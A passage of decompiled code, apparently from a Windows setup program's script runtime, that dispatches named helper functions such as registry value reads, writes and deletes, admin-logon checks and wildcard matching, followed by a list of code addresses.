																																														if(__eflags != 0) {
																																															E00403684( *((intOrPtr*)(__edx + 0x10)), "REGQUERYBINARYVALUE");
																																															if(__eflags != 0) {
																																																E00403684( *((intOrPtr*)(__edx + 0x10)), "REGWRITESTRINGVALUE");
																																																if(__eflags != 0) {
																																																	E00403684( *((intOrPtr*)(__edx + 0x10)), "REGWRITEEXPANDSTRINGVALUE");
																																																	if(__eflags != 0) {
																																																		E00403684( *((intOrPtr*)(__edx + 0x10)), "REGWRITEMULTISTRINGVALUE");
																																																		if(__eflags != 0) {
																																																			E00403684( *((intOrPtr*)(__edx + 0x10)), "REGWRITEDWORDVALUE");
																																																			if(__eflags != 0) {
																																																				E00403684( *((intOrPtr*)(__edx + 0x10)), "REGWRITEBINARYVALUE");
																																																				if(__eflags != 0) {
																																																					E00403684( *((intOrPtr*)(__edx + 0x10)), "ISADMINLOGGEDON");
																																																					if(__eflags != 0) {
																																																						E00403684( *((intOrPtr*)(__edx + 0x10)), "ISPOWERUSERLOGGEDON");
																																																						if(__eflags != 0) {
																																																							E00403684( *((intOrPtr*)(__edx + 0x10)), "FONTEXISTS");
																																																							if(__eflags != 0) {
																																																								E00403684( *((intOrPtr*)(__edx + 0x10)), "GETUILANGUAGE");
																																																								if(__eflags != 0) {
																																																									E00403684( *((intOrPtr*)(__edx + 0x10)), "ADDPERIOD");
																																																									if(__eflags != 0) {
																																																										E00403684( *((intOrPtr*)(__edx + 0x10)), "CHARLENGTH");
																																																										if(__eflags != 0) {
																																																											E00403684( *((intOrPtr*)(__edx + 0x10)), "SETNTFSCOMPRESSION");
																																																											if(__eflags != 0) {
																																																												E00403684( *((intOrPtr*)(__edx + 0x10)), "ISWILDCARD");
																																																												if(__eflags != 0) {
																																																													E00403684( *((intOrPtr*)(__edx + 0x10)), "WILDCARDMATCH");
																																																													if(__eflags != 0) {
																																																														_v5 = 0;
																																																													} else {
																																																														E004474E8(_t1280,  &_v28, _t1973 - 1, __edx);
																																																														E004474E8(_t1280,  &_v32, _t1973 - 2, _t1964);
																																																														_push(E00403738(_v32));
																																																														_t565 = E00403738(_v28);
																																																														_pop(_t1574);
																																																														E004475C0(_t1280, E0042ED30(_t565, _t1574), _t1973, _t1975, __fp0);
																																																													}
																																																												} else {
																																																													E004474E8(_t1280,  &_v72, _t1973 - 1, __edx);
																																																													E004475C0(_t1280, E0042EC58(_v72), _t1973, _t1975, __fp0);
																																																												}
																																																											} else {
																																																												E004474E8(_t1280,  &_v72, _t1973 - 1, __edx);
																																																												_push(_v72);
																																																												_t579 = E00447440(_t1280, _t1973 - 2, _t1964, _t1973, __fp0);
																																																												_t580 =  *0x49f452; // 0x1
																																																												_pop(_t1583);
																																																												E004475C0(_t1280, E004536DC(_t580, _t579, _t1583, __eflags), _t1973, _t1975, __fp0);
																																																											}
																																																										} else {
																																																											E004474E8(_t1280,  &_v72, _t1973 - 1, __edx);
																																																											_push(_v72);
																																																											_t588 = E0044748C(_t1280,  &_v72, _t1973 - 2, __fp0);
																																																											_pop(_t589);
																																																											E00447768(_t1280, E0042C8D4(_t589, _t588), _t1973, _t1975, __fp0);
																																																										}
																																																									} else {
																																																										E004474E8(_t1280,  &_v76, _t1973 - 1, __edx);
																																																										E0042EB3C(_v76,  &_v76,  &_v72);
																																																										E0044783C(_t1280, _v72, _t1973, _t1975);
																																																									}
																																																								} else {
																																																									E00447768(_t1280, E0042E8A8(_t1280, __edx, _t1973) & 0x0000ffff, _t1973, _t1975, __fp0);
																																																								}
																																																							} else {
																																																								E004474E8(_t1280,  &_v72, _t1973 - 1, __edx);
																																																								E004475C0(_t1280, E0042E7AC(_v72, _t1280), _t1973, _t1975, __fp0);
																																																							}
																																																						} else {
																																																							E004475C0(_t1280, E0042E754(), _t1973, _t1975, __fp0);
																																																						}
																																																					} else {
																																																						E004475C0(_t1280, E0042E748(), _t1973, _t1975, __fp0);
																																																					}
																																																				} else {
																																																					E004905A8(E0044748C(_t1280, _t1281, _t1973 - 1, __fp0),  &_v24,  &_v13);
																																																					E004474E8(_t1280,  &_v28, _t1973 - 2, _t1964);
																																																					_t623 = E0042E274(_v13, E00403738(_v28), _v24, 0,  &_v20, 0, 2, 0, 0, 0);
																																																					__eflags = _t623;
																																																					if(_t623 != 0) {
																																																						E004475C0(_t1280, 0, _t1973, _t1975, __fp0);
																																																					} else {
																																																						E004474E8(_t1280,  &_v32, _t1973 - 3, _t1964);
																																																						E0048F41C(_t1280,  &_v40, _t1973 - 4);
																																																						_t631 = E00403574(_v40);
																																																						_t633 = E00403744( &_v40);
																																																						_t637 = RegSetValueExA(_v20, E00403738(_v32), 0, 3, _t633, _t631);
																																																						__eflags = _t637;
																																																						if(_t637 != 0) {
																																																							__eflags = 0;
																																																							E004475C0(_t1280, 0, _t1973, _t1975, __fp0);
																																																						} else {
																																																							E004475C0(_t1280, 1, _t1973, _t1975, __fp0);
																																																						}
																																																						RegCloseKey(_v20);
																																																					}
																																																				}
																																																			} else {
																																																				E004905A8(E0044748C(_t1280, _t1281, _t1973 - 1, __fp0),  &_v24,  &_v13);
																																																				E004474E8(_t1280,  &_v28, _t1973 - 2, _t1964);
																																																				_t653 = E0042E274(_v13, E00403738(_v28), _v24, 0,  &_v20, 0, 2, 0, 0, 0);
																																																				__eflags = _t653;
																																																				if(_t653 != 0) {
																																																					E004475C0(_t1280, 0, _t1973, _t1975, __fp0);
																																																				} else {
																																																					E004474E8(_t1280,  &_v32, _t1973 - 3, _t1964);
																																																					_v52 = E0044748C(_t1280,  &_v32, _t1973 - 4, __fp0);
																																																					_t664 = RegSetValueExA(_v20, E00403738(_v32), 0, 4,  &_v52, 4);
																																																					__eflags = _t664;
																																																					if(_t664 != 0) {
																																																						__eflags = 0;
																																																						E004475C0(_t1280, 0, _t1973, _t1975, __fp0);
																																																					} else {
																																																						E004475C0(_t1280, 1, _t1973, _t1975, __fp0);
																																																					}
																																																					RegCloseKey(_v20);
																																																				}
																																																			}
																																																		} else {
																																																			E004905A8(E0044748C(_t1280, _t1281, _t1973 - 1, __fp0),  &_v24,  &_v13);
																																																			E004474E8(_t1280,  &_v28, _t1973 - 2, _t1964);
																																																			_t680 = E0042E274(_v13, E00403738(_v28), _v24, 0,  &_v20, 0, 2, 0, 0, 0);
																																																			__eflags = _t680;
																																																			if(_t680 != 0) {
																																																				E004475C0(_t1280, 0, _t1973, _t1975, __fp0);
																																																			} else {
																																																				E004474E8(_t1280,  &_v32, _t1973 - 3, _t1964);
																																																				E004474E8(_t1280,  &_v36, _t1973 - 4, _t1964);
																																																				__eflags = _v36;
																																																				if(_v36 != 0) {
																																																					_t703 = E00403574(_v36);
																																																					_t1640 = _v36;
																																																					__eflags =  *((char*)(_t1640 + _t703 - 1));
																																																					if( *((char*)(_t1640 + _t703 - 1)) != 0) {
																																																						E0040357C( &_v36, 0x4923cc);
																																																					}
																																																				}
																																																				_t688 = E00403574(_v36);
																																																				_t691 = E00403738(_v36);
																																																				_t695 = RegSetValueExA(_v20, E00403738(_v32), 0, 7, _t691, _t688 + 1);
																																																				__eflags = _t695;
																																																				if(_t695 != 0) {
																																																					__eflags = 0;
																																																					E004475C0(_t1280, 0, _t1973, _t1975, _t1980);
																																																				} else {
																																																					E004475C0(_t1280, 1, _t1973, _t1975, _t1980);
																																																				}
																																																				RegCloseKey(_v20);
																																																			}
																																																		}
																																																	} else {
																																																		E004905A8(E0044748C(_t1280, _t1281, _t1973 - 1, __fp0),  &_v24,  &_v13);
																																																		E004474E8(_t1280,  &_v28, _t1973 - 2, _t1964);
																																																		_t715 = E0042E274(_v13, E00403738(_v28), _v24, 0,  &_v20, 0, 2, 0, 0, 0);
																																																		__eflags = _t715;
																																																		if(_t715 != 0) {
																																																			E004475C0(_t1280, 0, _t1973, _t1975, __fp0);
																																																		} else {
																																																			E004474E8(_t1280,  &_v32, _t1973 - 3, _t1964);
																																																			E004474E8(_t1280,  &_v36, _t1973 - 4, _t1964);
																																																			_t723 = E00403574(_v36);
																																																			_t726 = E00403738(_v36);
																																																			_t730 = RegSetValueExA(_v20, E00403738(_v32), 0, 2, _t726, _t723 + 1);
																																																			__eflags = _t730;
																																																			if(_t730 != 0) {
																																																				__eflags = 0;
																																																				E004475C0(_t1280, 0, _t1973, _t1975, __fp0);
																																																			} else {
																																																				E004475C0(_t1280, 1, _t1973, _t1975, __fp0);
																																																			}
																																																			RegCloseKey(_v20);
																																																		}
																																																	}
																																																	goto L174;
																																																}
																																																E004905A8(E0044748C(_t1280, _t1281, _t1973 - 1, __fp0),  &_v24,  &_v13);
																																																E004474E8(_t1280,  &_v28, _t1973 - 2, _t1964);
																																																_t746 = E0042E274(_v13, E00403738(_v28), _v24, 0,  &_v20, 0, 3, 0, 0, 0);
																																																__eflags = _t746;
																																																if(_t746 != 0) {
																																																	E004475C0(_t1280, 0, _t1973, _t1975, __fp0);
																																																	goto L174;
																																																}
																																																E004474E8(_t1280,  &_v32, _t1973 - 3, _t1964);
																																																E004474E8(_t1280,  &_v36, _t1973 - 4, _t1964);
																																																_t1965 = E00403738(_v32);
																																																_t757 = RegQueryValueExA(_v20, _t1965, 0,  &_v48, 0, 0);
																																																__eflags = _t757;
																																																if(_t757 != 0) {
																																																	L118:
																																																	_v44 = 1;
																																																	L119:
																																																	_t759 = E00403574(_v36);
																																																	_t765 = RegSetValueExA(_v20, _t1965, 0, _v44, E00403738(_v36), _t759 + 1);
																																																	__eflags = _t765;
																																																	if(_t765 != 0) {
																																																		__eflags = 0;
																																																		E004475C0(_t1280, 0, _t1973, _t1975, _t1980);
																																																	} else {
																																																		E004475C0(_t1280, 1, _t1973, _t1975, _t1980);
																																																	}
																																																	RegCloseKey(_v20);
																																																	goto L174;
																																																}
																																																__eflags = _v48 - 2;
																																																if(_v48 != 2) {
																																																	goto L118;
																																																}
																																																_v44 = 2;
																																																goto L119;
																																															}
																																															E004905A8(E0044748C(_t1280, _t1281, _t1973 - 1, __fp0),  &_v24,  &_v13);
																																															E004474E8(_t1280,  &_v28, _t1973 - 2, _t1964);
																																															_t781 = E0042E2AC(_v13, E00403738(_v28), _v24,  &_v20, 1, 0);
																																															__eflags = _t781;
																																															if(_t781 != 0) {
																																																E004475C0(_t1280, 0, _t1973, _t1975, __fp0);
																																															} else {
																																																E004474E8(_t1280,  &_v32, _t1973 - 3, _t1964);
																																																_t1966 = E00403738(_v32);
																																																_t791 = RegQueryValueExA(_v20, _t1966, 0,  &_v44, 0,  &_v56);
																																																__eflags = _t791;
																																																if(_t791 != 0) {
																																																	__eflags = 0;
																																																	E004475C0(_t1280, 0, _t1973, _t1975, __fp0);
																																																} else {
																																																	E004038A4( &_v40, _v56);
																																																	_t803 = RegQueryValueExA(_v20, _t1966, 0,  &_v44, E00403744( &_v40),  &_v56);
																																																	__eflags = _t803;
																																																	if(_t803 != 0) {
																																																		E004475C0(_t1280, 0, _t1973, _t1975, __fp0);
																																																	} else {
																																																		E0048F434();
																																																		E004475C0(_t1280, 1, _t1973, _t1975, __fp0);
																																																	}
																																																}
																																																RegCloseKey(_v20);
																																															}
																																															goto L174;
																																														}
																																														E004905A8(E0044748C(_t1280, _t1281, _t1973 - 1, __fp0),  &_v24,  &_v13);
																																														E004474E8(_t1280,  &_v28, _t1973 - 2, _t1964);
																																														_t819 = E0042E2AC(_v13, E00403738(_v28), _v24,  &_v20, 1, 0);
																																														__eflags = _t819;
																																														if(_t819 != 0) {
																																															E004475C0(_t1280, 0, _t1973, _t1975, __fp0);
																																															goto L174;
																																														}
																																														E004474E8(_t1280,  &_v32, _t1973 - 3, _t1964);
																																														_v56 = 4;
																																														_t830 = RegQueryValueExA(_v20, E00403738(_v32), 0,  &_v44,  &_v52,  &_v56);
																																														__eflags = _t830;
																																														if(_t830 != 0) {
																																															L101:
																																															__eflags = 0;
																																															E004475C0(_t1280, 0, _t1973, _t1975, _t1980);
																																															L102:
																																															RegCloseKey(_v20);
																																															goto L174;
																																														}
																																														__eflags = _v44 - 4;
																																														if(_v44 != 4) {
																																															goto L101;
																																														}
																																														E00447768(_t1280, _v52, _t1973 - 4, _t1975, __fp0);
																																														E004475C0(_t1280, 1, _t1973, _t1975, __fp0);
																																														goto L102;
																																													}
																																													E004905A8(E0044748C(_t1280, _t1281, _t1973 - 1, __fp0),  &_v24,  &_v13);
																																													E004474E8(_t1280,  &_v28, _t1973 - 2, _t1964);
																																													_t848 = E0042E2AC(_v13, E00403738(_v28), _v24,  &_v20, 1, 0);
																																													__eflags = _t848;
																																													if(_t848 != 0) {
																																														E004475C0(_t1280, 0, _t1973, _t1975, __fp0);
																																													} else {
																																														E004474E8(_t1280,  &_v32, _t1973 - 3, _t1964);
																																														E004474E8(_t1280,  &_v28, _t1973 - 4, _t1973 - 4);
																																														E00403738(_v32);
																																														E004475C0(_t1280, E0042E1E8(), _t1973, _t1975, __fp0);
																																														E0044783C(_t1280, _v28, _t1973 - 4, _t1975);
																																														RegCloseKey(_v20);
																																													}
																																													goto L174;
																																												}
																																												E004905A8(E0044748C(_t1280, _t1281, _t1973 - 1, __fp0),  &_v24,  &_v13);
																																												E004474E8(_t1280,  &_v28, _t1973 - 2, _t1964);
																																												_t874 = E0042E2AC(_v13, E00403738(_v28), _v24,  &_v20, 1, 0); // executed
																																												__eflags = _t874;
																																												if(_t874 != 0) {
																																													E004475C0(_t1280, 0, _t1973, _t1975, __fp0);
																																												} else {
																																													E004474E8(_t1280,  &_v32, _t1973 - 3, _t1964);
																																													E004474E8(_t1280,  &_v28, _t1973 - 4, _t1973 - 4);
																																													E00403738(_v32);
																																													E004475C0(_t1280, E0042E1DC(), _t1973, _t1975, __fp0);
																																													E0044783C(_t1280, _v28, _t1973 - 4, _t1975);
																																													RegCloseKey(_v20);
																																												}
																																												goto L174;
																																											}
																																											E004905A8(E0044748C(_t1280, _t1281, _t1973 - 1, __fp0),  &_v24,  &_v13);
																																											E004439B4(E004474AC(_t1280, _t1973 - 3),  &_v68, 1);
																																											E004474E8(_t1280,  &_v72, _t1973 - 2, _t1964);
																																											E004475C0(_t1280, E0049067C(_v13, _t1280, _v72, _v24, _t1964, _t1973, __eflags, 0,  &_v68), _t1973, _t1975, __fp0);
																																											goto L174;
																																										}
																																										E004905A8(E0044748C(_t1280, _t1281, _t1973 - 1, __fp0),  &_v24,  &_v13);
																																										E004439B4(E004474AC(_t1280, _t1973 - 3),  &_v68, 1);
																																										E004474E8(_t1280,  &_v72, _t1973 - 2, _t1964);
																																										E004475C0(_t1280, E0049067C(_v13, _t1280, _v72, _v24, _t1964, _t1973, __eflags, 1,  &_v68), _t1973, _t1975, __fp0);
																																										goto L174;
																																									}
																																									E004905A8(E0044748C(_t1280, _t1281, _t1973 - 1, __fp0),  &_v24,  &_v13);
																																									E004474E8(_t1280,  &_v28, _t1973 - 2, _t1964);
																																									_t926 = E0042E2AC(_v13, E00403738(_v28), _v24,  &_v20, 2, 0);
																																									__eflags = _t926;
																																									if(_t926 != 0) {
																																										E004475C0(_t1280, 0, _t1973, _t1975, __fp0);
																																									} else {
																																										E004474E8(_t1280,  &_v32, _t1973 - 3, _t1964);
																																										__eflags = RegDeleteValueA(_v20, E00403738(_v32));
																																										E004475C0(_t1280,  &_v32 & 0xffffff00 | RegDeleteValueA(_v20, E00403738(_v32)) == 0x00000000, _t1973, _t1975, __fp0);
																																										RegCloseKey(_v20);
																																									}
																																									goto L174;
																																								}
																																								E004905A8(E0044748C(_t1280, _t1281, _t1973 - 1, __fp0),  &_v24,  &_v13);
																																								E004474E8(_t1280,  &_v28, _t1973 - 2, _t1964);
																																								E004475C0(_t1280, _t945 & 0xffffff00 | E0042E4A4(_v13, E00403738(_v28), _v24, __eflags) == 0x00000000, _t1973, _t1975, __fp0);
																																								goto L174;
																																							}
																																							E004905A8(E0044748C(_t1280, _t1281, _t1973 - 1, __fp0),  &_v24,  &_v13);
																																							E004474E8(_t1280,  &_v28, _t1973 - 2, _t1964);
																																							__eflags = E0042E350(_v13, _t1280, E00403738(_v28), _v24, _t1964, _t1973);
																																							E004475C0(_t1280, _t956 & 0xffffff00 | E0042E350(_v13, _t1280, E00403738(_v28), _v24, _t1964, _t1973) == 0x00000000, _t1973, _t1975, __fp0);
																																							goto L174;
																																						}
																																						E004905A8(E0044748C(_t1280, _t1281, _t1973 - 1, __fp0),  &_v24,  &_v13);
																																						E004474E8(_t1280,  &_v28, _t1973 - 2, _t1964);
																																						_t970 = E0042E2AC(_v13, E00403738(_v28), _v24,  &_v20, 1, 0);
																																						__eflags = _t970;
																																						if(_t970 != 0) {
																																							E004475C0(_t1280, 0, _t1973, _t1975, __fp0);
																																						} else {
																																							E004474E8(_t1280,  &_v32, _t1973 - 3, _t1964);
																																							E004475C0(_t1280, E0042E1F4(_v20, E00403738(_v32)), _t1973, _t1975, __fp0);
																																							RegCloseKey(_v20);
																																						}
																																						goto L174;
																																					}
																																					E004905A8(E0044748C(_t1280, _t1281, _t1973 - 1, __fp0),  &_v24,  &_v13);
																																					E004474E8(_t1280,  &_v28, _t1973 - 2, _t1964);
																																					_t992 = E0042E2AC(_v13, E00403738(_v28), _v24,  &_v20, 1, 0);
																																					__eflags = _t992;
																																					if(_t992 != 0) {
																																						E004475C0(_t1280, 0, _t1973, _t1975, __fp0);
																																					} else {
																																						E004475C0(_t1280, 1, _t1973, _t1975, __fp0);
																																						RegCloseKey(_v20);
																																					}
																																					goto L174;
																																				}
																																				E004474E8(_t1280,  &_v28, _t1973 - 1, __edx);
																																				E004475C0(_t1280, E0042DA28( &_v28, _t1280, _t1964, _t1973), _t1973, _t1975, __fp0);
																																				E0044783C(_t1280, _v28, _t1973 - 1, _t1975);
																																				goto L174;
																																			}
																																			E004474E8(_t1280,  &_v12, _t1973 - 1, __edx);
																																			_t1792 =  *0x49f0fc; // 0x2252cc8
																																			_t1010 = E0042CA98(_v12, _t1280,  &_v12, _t1792, _t1964, _t1973, __eflags);
																																			__eflags = _t1010;
																																			if(_t1010 == 0) {
																																				E004475C0(_t1280, 0, _t1973, _t1975, __fp0);
																																			} else {
																																				_t1014 = E00447440(_t1280, _t1973 - 3, _t1964, _t1973, __fp0);
																																				E004474E8(_t1280,  &_v72, _t1973 - 2, _t1964);
																																				_t1018 =  *0x49f452; // 0x1
																																				_t1019 = E00453058(_t1018, _v72, _v12, __eflags, _t1014 & 0x0000007f);
																																				asm("sbb ecx, ecx");
																																				E004475C0(_t1280,  ~( ~_t1019), _t1973, _t1975, __fp0);
																																			}
																																			goto L174;
																																		}
																																		E004475C0(_t1280, E0042E084(_t496), _t1973, _t1975, __fp0);
																																		goto L174;
																																	}
																																	E004474E8(_t1280,  &_v28, _t1973 - 1, __edx);
																																	_push(E00447440(_t1280, _t1973 - 4, _t1964, _t1973, __fp0));
																																	E004474E8(_t1280,  &_v72, _t1973 - 3, _t1964);
																																	_push(_v72);
																																	E004474E8(_t1280,  &_v76, _t1973 - 2, _t1964);
																																	_pop(_t1424);
																																	E00447768(_t1280, E0042DFA0( &_v28, _t1424, _v76), _t1973, _t1975, __fp0);
																																	E0044783C(_t1280, _v28, _t1973 - 1, _t1975);
																																	goto L174;
																																}
																																E004474E8(_t1280,  &_v28, _t1973 - 1, __edx);
																																E004474E8(_t1280,  &_v72, _t1973 - 3, _t1964);
																																_push(_v72);
																																E004474E8(_t1280,  &_v76, _t1973 - 2, _t1964);
																																E00447768(_t1280, E0042E058(), _t1973, _t1975, __fp0);
																																E0044783C(_t1280, _v28, _t1973 - 1, _t1975);
																																goto L174;
																															}
																															E0042DEA8( &_v72, _t1280, _t1281, __edx, _t1973);
																															E0044783C(_t1280, _v72, _t1973, _t1975);
																															goto L174;
																														}
																														_t1057 =  *0x49f446; // 0x1
																														E0042DE04(_t1057, _t1280, _t1281,  &_v72, __edx, _t1973);
																														E0044783C(_t1280, _v72, _t1973, _t1975);
																														goto L174;
																													}
																													E0042DD80( &_v72);
																													E0044783C(_t1280, _v72, _t1973, _t1975);
																												} else {
																													E0042DD54( &_v72);
																													E0044783C(_t1280, _v72, _t1973, _t1975);
																												}
																											} else {
																												E0042DD28( &_v72);
																												E0044783C(_t1280, _v72, _t1973, _t1975);
																											}
																										} else {
																											E004474E8(_t1280,  &_v76, _t1973 - 1, __edx);
																											_t1075 =  *0x49f452; // 0x1
																											E00453330(_t1075,  &_v72, _v76, __eflags);
																											E0044783C(_t1280, _v72, _t1973, _t1975);
																										}
																									} else {
																										E004474E8(_t1280,  &_v76, _t1973 - 1, __edx);
																										E0042D9D0(_v76,  &_v76,  &_v72);
																										E0044783C(_t1280, _v72, _t1973, _t1975);
																									}
																								} else {
																									E004474E8(_t1280,  &_v76, _t1973 - 1, __edx);
																									E0042D978(_v76,  &_v72, __eflags);
																									E0044783C(_t1280, _v72, _t1973, _t1975);
																								}
																							} else {
																								E004474E8(_t1280,  &_v76, _t1973 - 1, __edx);
																								E0042D050(_v76,  &_v76,  &_v72, __eflags);
																								E0044783C(_t1280, _v72, _t1973, _t1975);
																							}
																						} else {
																							E004474E8(_t1280,  &_v76, _t1973 - 1, __edx);
																							E0042CFF8(_v76,  &_v72);
																							E0044783C(_t1280, _v72, _t1973, _t1975);
																						}
																					} else {
																						E004474E8(_t1280,  &_v76, _t1973 - 1, __edx);
																						E0042C88C(_v76,  &_v72);
																						E0044783C(_t1280, _v72, _t1973, _t1975);
																					}
																				} else {
																					E0042D8DC(E0044748C(_t1280, _t1281, _t1973 - 1, __fp0), _t1280,  &_v72, _t1964, _t1973);
																					E0044783C(_t1280, _v72, _t1973, _t1975);
																				}
																			} else {
																				E00447768(_t1280, E0042D880(_t1280, __edx, _t1973, __eflags), _t1973, _t1975, __fp0);
																			}
																		} else {
																			E0042D7BC( &_v72, _t1280, _t1281, __edx, _t1973, __eflags);
																			E0044783C(_t1280, _v72, _t1973, _t1975);
																		}
																	} else {
																		E004474E8(_t1280,  &_v76, _t1973 - 1, __edx);
																		E0042D698(_v76,  &_v76,  &_v72);
																		E0044783C(_t1280, _v72, _t1973, _t1975);
																	}
																} else {
																	E004474E8(_t1280,  &_v72, _t1973 - 1, __edx);
																	_push(_v72);
																	E004474E8(_t1280,  &_v76, _t1973, _t1964);
																	_pop(_t1866);
																	E0042D65C(_v76, _t1866);
																}
															} else {
																E004474E8(_t1280,  &_v72, _t1973 - 2, __edx);
																_push(_v72);
																E004474E8(_t1280,  &_v76, _t1973 - 1, _t1964);
																_push(_v76);
																E004474E8(_t1280,  &_v80, _t1973, _t1964);
																_pop(_t1872);
																_pop(_t1461);
																E0042D610(_v80, _t1461, _t1872);
															}
														} else {
															E004474E8(_t1280,  &_v72, _t1973 - 4, __edx);
															_push(_v72);
															E004474E8(_t1280,  &_v76, _t1973 - 2, _t1964);
															_push(_v76);
															E004474E8(_t1280,  &_v80, _t1973 - 1, _t1964);
															E004475C0(_t1280, E0042D5F8(E00447440(_t1280, _t1973 - 3, _t1964, _t1973, __fp0), _v80), _t1973, _t1975, __fp0);
														}
													} else {
														E004474E8(_t1280,  &_v72, _t1973 - 4, __edx);
														_push(_v72);
														E004474E8(_t1280,  &_v76, _t1973 - 2, _t1964);
														_push(_v76);
														E004474E8(_t1280,  &_v80, _t1973 - 1, _t1964);
														_push(_v80);
														_t1169 = E0044748C(_t1280,  &_v80, _t1973 - 3, __fp0);
														_pop(_t1170);
														_pop(_t1891);
														E004475C0(_t1280, E0042D598(_t1170, _t1280, _t1169, _t1891, _t1964, _t1973), _t1973, _t1975, __fp0);
													}
												} else {
													E004474E8(_t1280,  &_v72, _t1973 - 4, __edx);
													_push(_v72);
													E004474E8(_t1280,  &_v76, _t1973 - 3, _t1964);
													_push(_v76);
													E004474E8(_t1280,  &_v80, _t1973 - 2, _t1964);
													_push(_v80);
													E004474E8(_t1280,  &_v84, _t1973 - 1, _t1964);
													_pop(_t1901);
													E004475C0(_t1280, E0042D528(_v84, _t1901), _t1973, _t1975, __fp0);
												}
											} else {
												E004474E8(_t1280,  &_v72, _t1973 - 2, __edx);
												_push(_v72);
												E004474E8(_t1280,  &_v76, _t1973 - 1, _t1964);
												_pop(_t1907);
												E004475C0(_t1280, E0042D4B8(_v76, _t1907), _t1973, _t1975, __fp0);
											}
										} else {
											E004474E8(_t1280,  &_v72, _t1973 - 3, __edx);
											_push(_v72);
											E004474E8(_t1280,  &_v76, _t1973 - 2, _t1964);
											_push(_v76);
											E004474E8(_t1280,  &_v80, _t1973 - 1, _t1964);
											_pop(_t1915);
											_pop(_t1484);
											E004475C0(_t1280, E0042D46C(_v80, _t1484, _t1915, __eflags), _t1973, _t1975, __fp0);
										}
									} else {
										E004474E8(_t1280,  &_v72, _t1973 - 4, __edx);
										_push(_v72);
										E004474E8(_t1280,  &_v76, _t1973 - 2, _t1964);
										_push(_v76);
										E004474E8(_t1280,  &_v80, _t1973 - 1, _t1964);
										_push(_v80);
										_t1220 = E00447440(_t1280, _t1973 - 3, _t1964, _t1973, __fp0);
										_pop(_t1221);
										_pop(_t1925);
										E004475C0(_t1280, E0042D3BC(_t1221, _t1220, _t1925, __eflags), _t1973, _t1975, __fp0);
									}
								} else {
									_push(E0044748C(_t1280, _t1281, _t1973 - 4, __fp0));
									_push(E0044748C(_t1280, _t1281, _t1973 - 5, __fp0));
									E004474E8(_t1280,  &_v72, _t1973 - 6, _t1964);
									_push(_v72);
									E004474E8(_t1280,  &_v76, _t1973 - 2, _t1964);
									_push(_v76);
									E004474E8(_t1280,  &_v80, _t1973 - 1, _t1964);
									_push(_v80);
									_t1239 = E0044748C(_t1280,  &_v80, _t1973 - 3, __fp0);
									_pop(_t1240);
									_pop(_t1939);
									E00447768(_t1280, E0042D328(_t1240, _t1280, _t1239, _t1939, _t1964, _t1973, __eflags), _t1973, _t1975, __fp0);
								}
							} else {
								E004474E8(_t1280,  &_v76, _t1973 - 4, __edx);
								_push(_v76);
								_push( &_v72);
								E004474E8(_t1280,  &_v80, _t1973 - 3, _t1964);
								_push(_v80);
								E004474E8(_t1280,  &_v84, _t1973 - 2, _t1964);
								_push(_v84);
								E004474E8(_t1280,  &_v88, _t1973 - 1, _t1964);
								_pop(_t1949);
								_pop(_t1500);
								E0042D224(_v88, _t1280, _t1500, _t1949, _t1964, _t1973);
								E0044783C(_t1280, _v72, _t1973, _t1975);
							}
						} else {
							E004474E8(_t1280,  &_v72, _t1973 - 1, __edx);
							_t1262 =  *0x49f452; // 0x1
							E004475C0(_t1280, E004531C8(_t1262, _v72, __eflags), _t1973, _t1975, __fp0);
						}
					} else {
						E004474E8(_t1280,  &_v72, _t1973 - 1, __edx);
						_t1268 =  *0x49f452; // 0x1
						E004475C0(_t1280, E00453158(_t1268, _v72, __eflags), _t1973, _t1975, __fp0);
					}
					goto L174;
				} else {
					E004474E8(_t1280,  &_v72, _t1973 - 1, __edx);
					_t1274 =  *0x49f452; // 0x1, executed
					_t1275 = E00453578(_t1274, _v72, _t1978); // executed
					E004475C0(_t1280, _t1275, _t1973, _t1975, __fp0);
					L174:
					_pop(_t1567);
					 *[fs:eax] = _t1567;
					_push(0x491f28);
					E00403420( &_v88, 5);
					E00403420( &_v40, 4);
					return E00403400( &_v12);
				}
			}

0x00490830
0x00490831
0x00490836
0x00490837
0x00490838
0x0049083b
0x0049083e
0x00490841
0x00490844
0x00490847
0x0049084a
0x0049084d
0x00490850
0x00490853
0x00490856
0x00490859
0x0049085b
0x00490860
0x00490861
0x00490866
0x00490869
0x0049086f
0x0049086f
0x00490870
0x0049087c
0x00490881
0x004908b5
0x004908ba
0x004908ee
0x004908f3
0x00490927
0x0049092c
0x0049099b
0x004909a0
0x00490a20
0x00490a25
0x00490a8b
0x00490a90
0x00490ae7
0x00490aec
0x00490b2f
0x00490b34
0x00490b9e
0x00490ba3
0x00490c09
0x00490c0e
0x00490c74
0x00490c79
0x00490cc2
0x00490cc7
0x00490cfc
0x00490d01
0x00490d34
0x00490d39
0x00490d5c
0x00490d61
0x00490d80
0x00490d85
0x00490db2
0x00490db7
0x00490dea
0x00490def
0x00490e22
0x00490e27
0x00490e5a
0x00490e5f
0x00490e92
0x00490e97
0x00490eca
0x00490ecf
0x00490f07
0x00490f0c
0x00490f2f
0x00490f34
0x00490f57
0x00490f5c
0x00490f7f
0x00490f84
0x00490fac
0x00490fb1
0x00490fd4
0x00490fd9
0x0049103b
0x00491040
0x004910af
0x004910b4
0x004910d3
0x004910d8
0x00491156
0x0049115b
0x00491197
0x0049119c
0x00491214
0x00491219
0x004912b6
0x004912bb
0x00491311
0x00491316
0x0049136c
0x00491371
0x00491411
0x00491416
0x0049147e
0x00491483
0x004914eb
0x004914f0
0x004915ad
0x004915b2
0x0049166f
0x00491674
0x0049174c
0x00491751
0x00491859
0x0049185e
0x00491970
0x00491975
0x00491a51
0x00491a56
0x00491b5b
0x00491b60
0x00491c2f
0x00491c34
0x00491d0f
0x00491d14
0x00491d33
0x00491d38
0x00491d57
0x00491d5c
0x00491d8b
0x00491d90
0x00491db0
0x00491db5
0x00491de8
0x00491ded
0x00491e2c
0x00491e31
0x00491e75
0x00491e7a
0x00491ea6
0x00491eab
0x00491eed
0x00491ead
0x00491eb5
0x00491ec4
0x00491ed1
0x00491ed5
0x00491eda
0x00491ee6
0x00491ee6
0x00491e7c
0x00491e84
0x00491e97
0x00491e97
0x00491e33
0x00491e3b
0x00491e43
0x00491e4b
0x00491e52
0x00491e57
0x00491e63
0x00491e63
0x00491def
0x00491df7
0x00491dff
0x00491e07
0x00491e0e
0x00491e1a
0x00491e1a
0x00491db7
0x00491dbf
0x00491dca
0x00491dd6
0x00491dd6
0x00491d92
0x00491d9e
0x00491d9e
0x00491d5e
0x00491d66
0x00491d79
0x00491d79
0x00491d3a
0x00491d45
0x00491d45
0x00491d16
0x00491d21
0x00491d21
0x00491c3a
0x00491c4a
0x00491c59
